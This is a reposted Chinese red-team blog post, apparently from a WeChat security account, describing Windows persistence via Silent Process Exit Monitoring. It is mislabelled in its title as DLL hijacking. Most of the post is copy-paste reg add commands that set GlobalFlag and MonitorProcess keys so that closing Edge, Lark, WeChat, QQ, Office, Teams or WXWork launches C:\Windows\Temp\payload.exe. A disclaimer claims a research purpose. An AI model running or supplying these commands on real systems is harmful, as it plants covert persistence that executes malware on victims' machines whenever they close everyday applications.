文章总结： 本文详解利用Windows静默进程退出监控机制实现权限维持。通过修改HKLM注册表配置Edge、飞书及微信等常用软件的GlobalFlag与MonitorProcess键值，当目标进程退出时自动触发恶意载荷。该方法需管理员权限写入注册表，但触发后为普通用户权限。文章提供了完整注册表命令，实操性强，但标题与内容不符且技术深度较浅。 综合评分： 65 文章分类： 红队,渗透测试,内网渗透

权限维持–DLL劫持

原创

One One

One security

2026年5月5日 20:45 北京

在小说阅读器读本章

去阅读

利用 Windows 的 Silent Process Exit Monitoring 功能，当目标进程退出时触发监控程序执行， HKLM 写入需要管理员，当用户使用某个应用并结束时自动执行恶意文件，触发后为普通用户权限

GlobalFlag 值说明

512 (0x200) = FLG_MONITOR_SILENT_PROCESS_EXIT    启用静默进程退出监控  其他常用值：  256 (0x100) = FLG_HEAP_ENABLE_TAIL_CHECK  1024 (0x400) = FLG_HEAP_VALIDATE_PARAMETERS  2048 (0x800) = FLG_HEAP_VALIDATE_ALL  ReportingMode 值说明  0 = LAUNCH_MONITOR_PROCESS (启动监控进程)  1 = LAUNCH_MONITOR_PROCESS_AND_EXIT  (启动监控进程并退出)  2 = LAUNCH_AND_SUSPEND_MONITOR_PROCESS

添加方法

劫持对象-Microsoft Edge

:: 启用进程退出监控  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msedge.exe" /v GlobalFlag /t  REG_DWORD /d 512 /f
  :: 配置静默退出监控  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\msedge.exe" /v ReportingMode /t REG_DWORD   /d 1 /f
  :: 设置监控程序（程序退出时触发）  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\msedge.exe" /v MonitorProcess /d  "C:\Windows\Temp\payload.exe" /f

劫持对象-飞书 Lark

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Lark.exe" /v GlobalFlag /t  REG_DWORD /d 512 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\Lark.exe" /v ReportingMode /t REG_DWORD  /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\Lark.exe" /v MonitorProcess /d  "C:\Windows\Temp\payload.exe" /f

其他常用目标

:: 微信  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WeChat.exe" /v GlobalFlag /t  REG_DWORD /d 512 /f
:: QQ  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQ.exe" /v GlobalFlag /t  REG_DWORD /d 512 /f
:: Excel  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EXCEL.EXE" /v GlobalFlag /t  REG_DWORD /d 512 /f
:: Word  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WINWORD.EXE" /v GlobalFlag /t  REG_DWORD /d 512 /f
:: Teams  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Teams.exe" /v GlobalFlag /t  REG_DWORD /d 512 /f
:: 企业微信  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WXWork.exe" /v GlobalFlag /t  REG_DWORD /d 512 /f

最近创建了一个交流群，需要的师傅可以扫码进入

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：One security One One《权限维持–DLL劫持》